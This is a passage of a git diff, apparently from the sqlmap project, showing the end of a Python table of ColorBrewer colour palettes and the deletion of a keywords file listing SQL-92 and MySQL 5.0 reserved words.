(251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'paired12': [(166, 206, 227), (106, 61, 154), (255, 255, 153), (177, 89, 40), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'paired3': [(166, 206, 227), (31, 120, 180), (178, 223, 138)], - 'paired4': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44)], - 'paired5': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153)], - 'paired6': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28)], - 'paired7': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111)], - 'paired8': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), (251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0)], - 'paired9': [(166, 206, 227), (31, 120, 180), (178, 223, 138), (51, 160, 44), 
(251, 154, 153), (227, 26, 28), (253, 191, 111), (255, 127, 0), (202, 178, 214)], - 'pastel13': [(251, 180, 174), (179, 205, 227), (204, 235, 197)], - 'pastel14': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228)], - 'pastel15': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166)], - 'pastel16': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204)], - 'pastel17': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204), (229, 216, 189)], - 'pastel18': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204), (229, 216, 189), (253, 218, 236)], - 'pastel19': [(251, 180, 174), (179, 205, 227), (204, 235, 197), (222, 203, 228), (254, 217, 166), (255, 255, 204), (229, 216, 189), (253, 218, 236), (242, 242, 242)], - 'pastel23': [(179, 226, 205), (253, 205, 172), (203, 213, 232)], - 'pastel24': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228)], - 'pastel25': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201)], - 'pastel26': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201), (255, 242, 174)], - 'pastel27': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201), (255, 242, 174), (241, 226, 204)], - 'pastel28': [(179, 226, 205), (253, 205, 172), (203, 213, 232), (244, 202, 228), (230, 245, 201), (255, 242, 174), (241, 226, 204), (204, 204, 204)], - 'piyg10': [(142, 1, 82), (39, 100, 25), (197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (230, 245, 208), (184, 225, 134), (127, 188, 65), (77, 146, 33)], - 'piyg11': [(142, 1, 82), (77, 146, 33), (39, 100, 25), (197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (247, 247, 247), (230, 245, 208), (184, 225, 134), (127, 188, 65)], - 'piyg3': [(233, 163, 201), (247, 247, 247), (161, 215, 106)], - 'piyg4': [(208, 28, 139), (241, 182, 218), (184, 225, 134), (77, 172, 38)], - 'piyg5': [(208, 28, 139), (241, 182, 218), (247, 247, 247), (184, 225, 134), (77, 172, 38)], - 'piyg6': [(197, 27, 125), (233, 163, 201), (253, 224, 239), (230, 245, 208), (161, 215, 106), (77, 146, 33)], - 'piyg7': [(197, 27, 125), (233, 163, 201), (253, 224, 239), (247, 247, 247), (230, 245, 208), (161, 215, 106), (77, 146, 33)], - 'piyg8': [(197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (230, 245, 208), (184, 225, 134), (127, 188, 65), (77, 146, 33)], - 'piyg9': [(197, 27, 125), (222, 119, 174), (241, 182, 218), (253, 224, 239), (247, 247, 247), (230, 245, 208), (184, 225, 134), (127, 188, 65), (77, 146, 33)], - 'prgn10': [(64, 0, 75), (0, 68, 27), (118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (217, 240, 211), (166, 219, 160), (90, 174, 97), (27, 120, 55)], - 'prgn11': [(64, 0, 75), (27, 120, 55), (0, 68, 27), (118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (247, 247, 247), (217, 240, 211), (166, 219, 160), (90, 174, 97)], - 'prgn3': [(175, 141, 195), (247, 247, 247), (127, 191, 123)], - 'prgn4': [(123, 50, 148), (194, 165, 207), (166, 219, 160), (0, 136, 55)], - 'prgn5': [(123, 50, 148), (194, 165, 207), (247, 247, 247), (166, 219, 160), (0, 136, 55)], - 'prgn6': [(118, 42, 131), (175, 141, 195), (231, 212, 232), (217, 240, 211), (127, 191, 123), (27, 120, 55)], - 'prgn7': [(118, 42, 131), (175, 141, 195), (231, 212, 232), (247, 247, 247), (217, 240, 211), (127, 191, 123), (27, 120, 55)], - 
'prgn8': [(118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (217, 240, 211), (166, 219, 160), (90, 174, 97), (27, 120, 55)], - 'prgn9': [(118, 42, 131), (153, 112, 171), (194, 165, 207), (231, 212, 232), (247, 247, 247), (217, 240, 211), (166, 219, 160), (90, 174, 97), (27, 120, 55)], - 'pubu3': [(236, 231, 242), (166, 189, 219), (43, 140, 190)], - 'pubu4': [(241, 238, 246), (189, 201, 225), (116, 169, 207), (5, 112, 176)], - 'pubu5': [(241, 238, 246), (189, 201, 225), (116, 169, 207), (43, 140, 190), (4, 90, 141)], - 'pubu6': [(241, 238, 246), (208, 209, 230), (166, 189, 219), (116, 169, 207), (43, 140, 190), (4, 90, 141)], - 'pubu7': [(241, 238, 246), (208, 209, 230), (166, 189, 219), (116, 169, 207), (54, 144, 192), (5, 112, 176), (3, 78, 123)], - 'pubu8': [(255, 247, 251), (236, 231, 242), (208, 209, 230), (166, 189, 219), (116, 169, 207), (54, 144, 192), (5, 112, 176), (3, 78, 123)], - 'pubu9': [(255, 247, 251), (236, 231, 242), (208, 209, 230), (166, 189, 219), (116, 169, 207), (54, 144, 192), (5, 112, 176), (4, 90, 141), (2, 56, 88)], - 'pubugn3': [(236, 226, 240), (166, 189, 219), (28, 144, 153)], - 'pubugn4': [(246, 239, 247), (189, 201, 225), (103, 169, 207), (2, 129, 138)], - 'pubugn5': [(246, 239, 247), (189, 201, 225), (103, 169, 207), (28, 144, 153), (1, 108, 89)], - 'pubugn6': [(246, 239, 247), (208, 209, 230), (166, 189, 219), (103, 169, 207), (28, 144, 153), (1, 108, 89)], - 'pubugn7': [(246, 239, 247), (208, 209, 230), (166, 189, 219), (103, 169, 207), (54, 144, 192), (2, 129, 138), (1, 100, 80)], - 'pubugn8': [(255, 247, 251), (236, 226, 240), (208, 209, 230), (166, 189, 219), (103, 169, 207), (54, 144, 192), (2, 129, 138), (1, 100, 80)], - 'pubugn9': [(255, 247, 251), (236, 226, 240), (208, 209, 230), (166, 189, 219), (103, 169, 207), (54, 144, 192), (2, 129, 138), (1, 108, 89), (1, 70, 54)], - 'puor10': [(127, 59, 8), (45, 0, 75), (179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (216, 218, 235), (178, 171, 210), (128, 115, 172), (84, 39, 136)], - 'puor11': [(127, 59, 8), (84, 39, 136), (45, 0, 75), (179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (247, 247, 247), (216, 218, 235), (178, 171, 210), (128, 115, 172)], - 'puor3': [(241, 163, 64), (247, 247, 247), (153, 142, 195)], - 'puor4': [(230, 97, 1), (253, 184, 99), (178, 171, 210), (94, 60, 153)], - 'puor5': [(230, 97, 1), (253, 184, 99), (247, 247, 247), (178, 171, 210), (94, 60, 153)], - 'puor6': [(179, 88, 6), (241, 163, 64), (254, 224, 182), (216, 218, 235), (153, 142, 195), (84, 39, 136)], - 'puor7': [(179, 88, 6), (241, 163, 64), (254, 224, 182), (247, 247, 247), (216, 218, 235), (153, 142, 195), (84, 39, 136)], - 'puor8': [(179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (216, 218, 235), (178, 171, 210), (128, 115, 172), (84, 39, 136)], - 'puor9': [(179, 88, 6), (224, 130, 20), (253, 184, 99), (254, 224, 182), (247, 247, 247), (216, 218, 235), (178, 171, 210), (128, 115, 172), (84, 39, 136)], - 'purd3': [(231, 225, 239), (201, 148, 199), (221, 28, 119)], - 'purd4': [(241, 238, 246), (215, 181, 216), (223, 101, 176), (206, 18, 86)], - 'purd5': [(241, 238, 246), (215, 181, 216), (223, 101, 176), (221, 28, 119), (152, 0, 67)], - 'purd6': [(241, 238, 246), (212, 185, 218), (201, 148, 199), (223, 101, 176), (221, 28, 119), (152, 0, 67)], - 'purd7': [(241, 238, 246), (212, 185, 218), (201, 148, 199), (223, 101, 176), (231, 41, 138), (206, 18, 86), (145, 0, 63)], - 'purd8': [(247, 244, 249), (231, 225, 239), (212, 185, 218), (201, 148, 199), (223, 101, 176), 
(231, 41, 138), (206, 18, 86), (145, 0, 63)], - 'purd9': [(247, 244, 249), (231, 225, 239), (212, 185, 218), (201, 148, 199), (223, 101, 176), (231, 41, 138), (206, 18, 86), (152, 0, 67), (103, 0, 31)], - 'purples3': [(239, 237, 245), (188, 189, 220), (117, 107, 177)], - 'purples4': [(242, 240, 247), (203, 201, 226), (158, 154, 200), (106, 81, 163)], - 'purples5': [(242, 240, 247), (203, 201, 226), (158, 154, 200), (117, 107, 177), (84, 39, 143)], - 'purples6': [(242, 240, 247), (218, 218, 235), (188, 189, 220), (158, 154, 200), (117, 107, 177), (84, 39, 143)], - 'purples7': [(242, 240, 247), (218, 218, 235), (188, 189, 220), (158, 154, 200), (128, 125, 186), (106, 81, 163), (74, 20, 134)], - 'purples8': [(252, 251, 253), (239, 237, 245), (218, 218, 235), (188, 189, 220), (158, 154, 200), (128, 125, 186), (106, 81, 163), (74, 20, 134)], - 'purples9': [(252, 251, 253), (239, 237, 245), (218, 218, 235), (188, 189, 220), (158, 154, 200), (128, 125, 186), (106, 81, 163), (84, 39, 143), (63, 0, 125)], - 'rdbu10': [(103, 0, 31), (5, 48, 97), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (209, 229, 240), (146, 197, 222), (67, 147, 195), (33, 102, 172)], - 'rdbu11': [(103, 0, 31), (33, 102, 172), (5, 48, 97), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (247, 247, 247), (209, 229, 240), (146, 197, 222), (67, 147, 195)], - 'rdbu3': [(239, 138, 98), (247, 247, 247), (103, 169, 207)], - 'rdbu4': [(202, 0, 32), (244, 165, 130), (146, 197, 222), (5, 113, 176)], - 'rdbu5': [(202, 0, 32), (244, 165, 130), (247, 247, 247), (146, 197, 222), (5, 113, 176)], - 'rdbu6': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (209, 229, 240), (103, 169, 207), (33, 102, 172)], - 'rdbu7': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (247, 247, 247), (209, 229, 240), (103, 169, 207), (33, 102, 172)], - 'rdbu8': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (209, 229, 240), (146, 197, 222), (67, 147, 195), (33, 102, 172)], - 'rdbu9': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (247, 247, 247), (209, 229, 240), (146, 197, 222), (67, 147, 195), (33, 102, 172)], - 'rdgy10': [(103, 0, 31), (26, 26, 26), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (224, 224, 224), (186, 186, 186), (135, 135, 135), (77, 77, 77)], - 'rdgy11': [(103, 0, 31), (77, 77, 77), (26, 26, 26), (178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (255, 255, 255), (224, 224, 224), (186, 186, 186), (135, 135, 135)], - 'rdgy3': [(239, 138, 98), (255, 255, 255), (153, 153, 153)], - 'rdgy4': [(202, 0, 32), (244, 165, 130), (186, 186, 186), (64, 64, 64)], - 'rdgy5': [(202, 0, 32), (244, 165, 130), (255, 255, 255), (186, 186, 186), (64, 64, 64)], - 'rdgy6': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (224, 224, 224), (153, 153, 153), (77, 77, 77)], - 'rdgy7': [(178, 24, 43), (239, 138, 98), (253, 219, 199), (255, 255, 255), (224, 224, 224), (153, 153, 153), (77, 77, 77)], - 'rdgy8': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (224, 224, 224), (186, 186, 186), (135, 135, 135), (77, 77, 77)], - 'rdgy9': [(178, 24, 43), (214, 96, 77), (244, 165, 130), (253, 219, 199), (255, 255, 255), (224, 224, 224), (186, 186, 186), (135, 135, 135), (77, 77, 77)], - 'rdpu3': [(253, 224, 221), (250, 159, 181), (197, 27, 138)], - 'rdpu4': [(254, 235, 226), (251, 180, 185), (247, 104, 161), (174, 1, 126)], - 'rdpu5': [(254, 235, 226), (251, 180, 185), (247, 104, 161), (197, 27, 138), (122, 1, 119)], - 'rdpu6': [(254, 235, 226), (252, 197, 192), 
(250, 159, 181), (247, 104, 161), (197, 27, 138), (122, 1, 119)], - 'rdpu7': [(254, 235, 226), (252, 197, 192), (250, 159, 181), (247, 104, 161), (221, 52, 151), (174, 1, 126), (122, 1, 119)], - 'rdpu8': [(255, 247, 243), (253, 224, 221), (252, 197, 192), (250, 159, 181), (247, 104, 161), (221, 52, 151), (174, 1, 126), (122, 1, 119)], - 'rdpu9': [(255, 247, 243), (253, 224, 221), (252, 197, 192), (250, 159, 181), (247, 104, 161), (221, 52, 151), (174, 1, 126), (122, 1, 119), (73, 0, 106)], - 'rdylbu10': [(165, 0, 38), (49, 54, 149), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (224, 243, 248), (171, 217, 233), (116, 173, 209), (69, 117, 180)], - 'rdylbu11': [(165, 0, 38), (69, 117, 180), (49, 54, 149), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (255, 255, 191), (224, 243, 248), (171, 217, 233), (116, 173, 209)], - 'rdylbu3': [(252, 141, 89), (255, 255, 191), (145, 191, 219)], - 'rdylbu4': [(215, 25, 28), (253, 174, 97), (171, 217, 233), (44, 123, 182)], - 'rdylbu5': [(215, 25, 28), (253, 174, 97), (255, 255, 191), (171, 217, 233), (44, 123, 182)], - 'rdylbu6': [(215, 48, 39), (252, 141, 89), (254, 224, 144), (224, 243, 248), (145, 191, 219), (69, 117, 180)], - 'rdylbu7': [(215, 48, 39), (252, 141, 89), (254, 224, 144), (255, 255, 191), (224, 243, 248), (145, 191, 219), (69, 117, 180)], - 'rdylbu8': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (224, 243, 248), (171, 217, 233), (116, 173, 209), (69, 117, 180)], - 'rdylbu9': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 144), (255, 255, 191), (224, 243, 248), (171, 217, 233), (116, 173, 209), (69, 117, 180)], - 'rdylgn10': [(165, 0, 38), (0, 104, 55), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (217, 239, 139), (166, 217, 106), (102, 189, 99), (26, 152, 80)], - 'rdylgn11': [(165, 0, 38), (26, 152, 80), (0, 104, 55), (215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (217, 239, 139), (166, 217, 106), (102, 189, 99)], - 'rdylgn3': [(252, 141, 89), (255, 255, 191), (145, 207, 96)], - 'rdylgn4': [(215, 25, 28), (253, 174, 97), (166, 217, 106), (26, 150, 65)], - 'rdylgn5': [(215, 25, 28), (253, 174, 97), (255, 255, 191), (166, 217, 106), (26, 150, 65)], - 'rdylgn6': [(215, 48, 39), (252, 141, 89), (254, 224, 139), (217, 239, 139), (145, 207, 96), (26, 152, 80)], - 'rdylgn7': [(215, 48, 39), (252, 141, 89), (254, 224, 139), (255, 255, 191), (217, 239, 139), (145, 207, 96), (26, 152, 80)], - 'rdylgn8': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (217, 239, 139), (166, 217, 106), (102, 189, 99), (26, 152, 80)], - 'rdylgn9': [(215, 48, 39), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (217, 239, 139), (166, 217, 106), (102, 189, 99), (26, 152, 80)], - 'reds3': [(254, 224, 210), (252, 146, 114), (222, 45, 38)], - 'reds4': [(254, 229, 217), (252, 174, 145), (251, 106, 74), (203, 24, 29)], - 'reds5': [(254, 229, 217), (252, 174, 145), (251, 106, 74), (222, 45, 38), (165, 15, 21)], - 'reds6': [(254, 229, 217), (252, 187, 161), (252, 146, 114), (251, 106, 74), (222, 45, 38), (165, 15, 21)], - 'reds7': [(254, 229, 217), (252, 187, 161), (252, 146, 114), (251, 106, 74), (239, 59, 44), (203, 24, 29), (153, 0, 13)], - 'reds8': [(255, 245, 240), (254, 224, 210), (252, 187, 161), (252, 146, 114), (251, 106, 74), (239, 59, 44), (203, 24, 29), (153, 0, 13)], - 'reds9': [(255, 245, 240), (254, 224, 210), (252, 187, 161), (252, 146, 114), (251, 106, 74), (239, 59, 44), (203, 24, 29), (165, 15, 21), (103, 
0, 13)], - 'set13': [(228, 26, 28), (55, 126, 184), (77, 175, 74)], - 'set14': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163)], - 'set15': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0)], - 'set16': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51)], - 'set17': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51), (166, 86, 40)], - 'set18': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51), (166, 86, 40), (247, 129, 191)], - 'set19': [(228, 26, 28), (55, 126, 184), (77, 175, 74), (152, 78, 163), (255, 127, 0), (255, 255, 51), (166, 86, 40), (247, 129, 191), (153, 153, 153)], - 'set23': [(102, 194, 165), (252, 141, 98), (141, 160, 203)], - 'set24': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195)], - 'set25': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84)], - 'set26': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84), (255, 217, 47)], - 'set27': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84), (255, 217, 47), (229, 196, 148)], - 'set28': [(102, 194, 165), (252, 141, 98), (141, 160, 203), (231, 138, 195), (166, 216, 84), (255, 217, 47), (229, 196, 148), (179, 179, 179)], - 'set310': [(141, 211, 199), (188, 128, 189), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'set311': [(141, 211, 199), (188, 128, 189), (204, 235, 197), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'set312': [(141, 211, 199), (188, 128, 189), (204, 235, 197), (255, 237, 111), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'set33': [(141, 211, 199), (255, 255, 179), (190, 186, 218)], - 'set34': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114)], - 'set35': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211)], - 'set36': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98)], - 'set37': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105)], - 'set38': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229)], - 'set39': [(141, 211, 199), (255, 255, 179), (190, 186, 218), (251, 128, 114), (128, 177, 211), (253, 180, 98), (179, 222, 105), (252, 205, 229), (217, 217, 217)], - 'spectral10': [(158, 1, 66), (94, 79, 162), (213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (230, 245, 152), (171, 221, 164), (102, 194, 165), (50, 136, 189)], - 'spectral11': [(158, 1, 66), (50, 136, 189), (94, 79, 162), (213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (230, 245, 152), (171, 221, 164), (102, 194, 165)], - 'spectral3': [(252, 141, 89), (255, 255, 191), (153, 213, 148)], - 'spectral4': [(215, 25, 28), (253, 174, 97), (171, 221, 164), (43, 131, 186)], - 'spectral5': [(215, 25, 28), (253, 174, 97), (255, 255, 191), (171, 221, 164), (43, 131, 186)], - 'spectral6': [(213, 62, 79), (252, 141, 89), (254, 224, 139), (230, 245, 152), (153, 213, 148), (50, 136, 189)], - 'spectral7': [(213, 62, 79), (252, 
141, 89), (254, 224, 139), (255, 255, 191), (230, 245, 152), (153, 213, 148), (50, 136, 189)], - 'spectral8': [(213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (230, 245, 152), (171, 221, 164), (102, 194, 165), (50, 136, 189)], - 'spectral9': [(213, 62, 79), (244, 109, 67), (253, 174, 97), (254, 224, 139), (255, 255, 191), (230, 245, 152), (171, 221, 164), (102, 194, 165), (50, 136, 189)], - 'ylgn3': [(247, 252, 185), (173, 221, 142), (49, 163, 84)], - 'ylgn4': [(255, 255, 204), (194, 230, 153), (120, 198, 121), (35, 132, 67)], - 'ylgn5': [(255, 255, 204), (194, 230, 153), (120, 198, 121), (49, 163, 84), (0, 104, 55)], - 'ylgn6': [(255, 255, 204), (217, 240, 163), (173, 221, 142), (120, 198, 121), (49, 163, 84), (0, 104, 55)], - 'ylgn7': [(255, 255, 204), (217, 240, 163), (173, 221, 142), (120, 198, 121), (65, 171, 93), (35, 132, 67), (0, 90, 50)], - 'ylgn8': [(255, 255, 229), (247, 252, 185), (217, 240, 163), (173, 221, 142), (120, 198, 121), (65, 171, 93), (35, 132, 67), (0, 90, 50)], - 'ylgn9': [(255, 255, 229), (247, 252, 185), (217, 240, 163), (173, 221, 142), (120, 198, 121), (65, 171, 93), (35, 132, 67), (0, 104, 55), (0, 69, 41)], - 'ylgnbu3': [(237, 248, 177), (127, 205, 187), (44, 127, 184)], - 'ylgnbu4': [(255, 255, 204), (161, 218, 180), (65, 182, 196), (34, 94, 168)], - 'ylgnbu5': [(255, 255, 204), (161, 218, 180), (65, 182, 196), (44, 127, 184), (37, 52, 148)], - 'ylgnbu6': [(255, 255, 204), (199, 233, 180), (127, 205, 187), (65, 182, 196), (44, 127, 184), (37, 52, 148)], - 'ylgnbu7': [(255, 255, 204), (199, 233, 180), (127, 205, 187), (65, 182, 196), (29, 145, 192), (34, 94, 168), (12, 44, 132)], - 'ylgnbu8': [(255, 255, 217), (237, 248, 177), (199, 233, 180), (127, 205, 187), (65, 182, 196), (29, 145, 192), (34, 94, 168), (12, 44, 132)], - 'ylgnbu9': [(255, 255, 217), (237, 248, 177), (199, 233, 180), (127, 205, 187), (65, 182, 196), (29, 145, 192), (34, 94, 168), (37, 52, 148), (8, 29, 88)], - 'ylorbr3': [(255, 247, 188), (254, 196, 79), (217, 95, 14)], - 'ylorbr4': [(255, 255, 212), (254, 217, 142), (254, 153, 41), (204, 76, 2)], - 'ylorbr5': [(255, 255, 212), (254, 217, 142), (254, 153, 41), (217, 95, 14), (153, 52, 4)], - 'ylorbr6': [(255, 255, 212), (254, 227, 145), (254, 196, 79), (254, 153, 41), (217, 95, 14), (153, 52, 4)], - 'ylorbr7': [(255, 255, 212), (254, 227, 145), (254, 196, 79), (254, 153, 41), (236, 112, 20), (204, 76, 2), (140, 45, 4)], - 'ylorbr8': [(255, 255, 229), (255, 247, 188), (254, 227, 145), (254, 196, 79), (254, 153, 41), (236, 112, 20), (204, 76, 2), (140, 45, 4)], - 'ylorbr9': [(255, 255, 229), (255, 247, 188), (254, 227, 145), (254, 196, 79), (254, 153, 41), (236, 112, 20), (204, 76, 2), (153, 52, 4), (102, 37, 6)], - 'ylorrd3': [(255, 237, 160), (254, 178, 76), (240, 59, 32)], - 'ylorrd4': [(255, 255, 178), (254, 204, 92), (253, 141, 60), (227, 26, 28)], - 'ylorrd5': [(255, 255, 178), (254, 204, 92), (253, 141, 60), (240, 59, 32), (189, 0, 38)], - 'ylorrd6': [(255, 255, 178), (254, 217, 118), (254, 178, 76), (253, 141, 60), (240, 59, 32), (189, 0, 38)], - 'ylorrd7': [(255, 255, 178), (254, 217, 118), (254, 178, 76), (253, 141, 60), (252, 78, 42), (227, 26, 28), (177, 0, 38)], - 'ylorrd8': [(255, 255, 204), (255, 237, 160), (254, 217, 118), (254, 178, 76), (253, 141, 60), (252, 78, 42), (227, 26, 28), (177, 0, 38)], -} - - -if __name__ == '__main__': - main() diff --git a/txt/keywords.txt b/txt/keywords.txt deleted file mode 100644 index 432746afd76..00000000000 --- a/txt/keywords.txt +++ /dev/null @@ -1,453 +0,0 @@ -# Copyright 
(c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# SQL-92 keywords (reference: http://developer.mimer.com/validator/sql-reserved-words.tml) - -ABSOLUTE -ACTION -ADD -ALL -ALLOCATE -ALTER -AND -ANY -ARE -AS -ASC -ASSERTION -AT -AUTHORIZATION -AVG -BEGIN -BETWEEN -BIT -BIT_LENGTH -BOTH -BY -CALL -CASCADE -CASCADED -CASE -CAST -CATALOG -CHAR -CHAR_LENGTH -CHARACTER -CHARACTER_LENGTH -CHECK -CLOSE -COALESCE -COLLATE -COLLATION -COLUMN -COMMIT -CONDITION -CONNECT -CONNECTION -CONSTRAINT -CONSTRAINTS -CONTAINS -CONTINUE -CONVERT -CORRESPONDING -COUNT -CREATE -CROSS -CURRENT -CURRENT_DATE -CURRENT_PATH -CURRENT_TIME -CURRENT_TIMESTAMP -CURRENT_USER -CURSOR -DATE -DAY -DEALLOCATE -DEC -DECIMAL -DECLARE -DEFAULT -DEFERRABLE -DEFERRED -DELETE -DESC -DESCRIBE -DESCRIPTOR -DETERMINISTIC -DIAGNOSTICS -DISCONNECT -DISTINCT -DO -DOMAIN -DOUBLE -DROP -ELSE -ELSEIF -END -ESCAPE -EXCEPT -EXCEPTION -EXEC -EXECUTE -EXISTS -EXIT -EXTERNAL -EXTRACT -FALSE -FETCH -FIRST -FLOAT -FOR -FOREIGN -FOUND -FROM -FULL -FUNCTION -GET -GLOBAL -GO -GOTO -GRANT -GROUP -HANDLER -HAVING -HOUR -IDENTITY -IF -IMMEDIATE -IN -INDICATOR -INITIALLY -INNER -INOUT -INPUT -INSENSITIVE -INSERT -INT -INTEGER -INTERSECT -INTERVAL -INTO -IS -ISOLATION -JOIN -KEY -LANGUAGE -LAST -LEADING -LEAVE -LEFT -LEVEL -LIKE -LOCAL -LOOP -LOWER -MATCH -MAX -MIN -MINUTE -MODULE -MONTH -NAMES -NATIONAL -NATURAL -NCHAR -NEXT -NO -NOT -NULL -NULLIF -NUMERIC -OCTET_LENGTH -OF -ON -ONLY -OPEN -OPTION -OR -ORDER -OUT -OUTER -OUTPUT -OVERLAPS -PAD -PARAMETER -PARTIAL -PATH -POSITION -PRECISION -PREPARE -PRESERVE -PRIMARY -PRIOR -PRIVILEGES -PROCEDURE -PUBLIC -READ -REAL -REFERENCES -RELATIVE -REPEAT -RESIGNAL -RESTRICT -RETURN -RETURNS -REVOKE -RIGHT -ROLLBACK -ROUTINE -ROWS -SCHEMA -SCROLL -SECOND -SECTION -SELECT -SESSION -SESSION_USER -SET -SIGNAL -SIZE -SMALLINT -SOME -SPACE -SPECIFIC -SQL -SQLCODE -SQLERROR -SQLEXCEPTION -SQLSTATE -SQLWARNING -SUBSTRING -SUM -SYSTEM_USER -TABLE -TEMPORARY -THEN -TIME -TIMESTAMP -TIMEZONE_HOUR -TIMEZONE_MINUTE -TO -TRAILING -TRANSACTION -TRANSLATE -TRANSLATION -TRIM -TRUE -UNDO -UNION -UNIQUE -UNKNOWN -UNTIL -UPDATE -UPPER -USAGE -USER -USING -VALUE -VALUES -VARCHAR -VARYING -VIEW -WHEN -WHENEVER -WHERE -WHILE -WITH -WORK -WRITE -YEAR -ZONE - -# MySQL 5.0 keywords (reference: http://dev.mysql.com/doc/refman/5.0/en/reserved-words.html) -ADD -ALL -ALTER -ANALYZE -AND -ASASC -ASENSITIVE -BEFORE -BETWEEN -BIGINT -BINARYBLOB -BOTH -BY -CALL -CASCADE -CASECHANGE -CAST -CHAR -CHARACTER -CHECK -COLLATE -COLUMN -CONCAT -CONDITIONCONSTRAINT -CONTINUE -CONVERT -CREATE -CROSS -CURRENT_DATE -CURRENT_TIMECURRENT_TIMESTAMP -CURRENT_USER -CURSOR -DATABASE -DATABASES -DAY_HOUR -DAY_MICROSECONDDAY_MINUTE -DAY_SECOND -DEC -DECIMAL -DECLARE -DEFAULTDELAYED -DELETE -DESC -DESCRIBE -DETERMINISTIC -DISTINCTDISTINCTROW -DIV -DOUBLE -DROP -DUAL -EACH -ELSEELSEIF -ENCLOSED -ESCAPED -EXISTS -EXIT -EXPLAIN -FALSEFETCH -FLOAT -FLOAT4 -FLOAT8 -FOR -FORCE -FOREIGNFROM -FULLTEXT -GRANT -GROUP -HAVING -HIGH_PRIORITYHOUR_MICROSECOND -HOUR_MINUTE -HOUR_SECOND 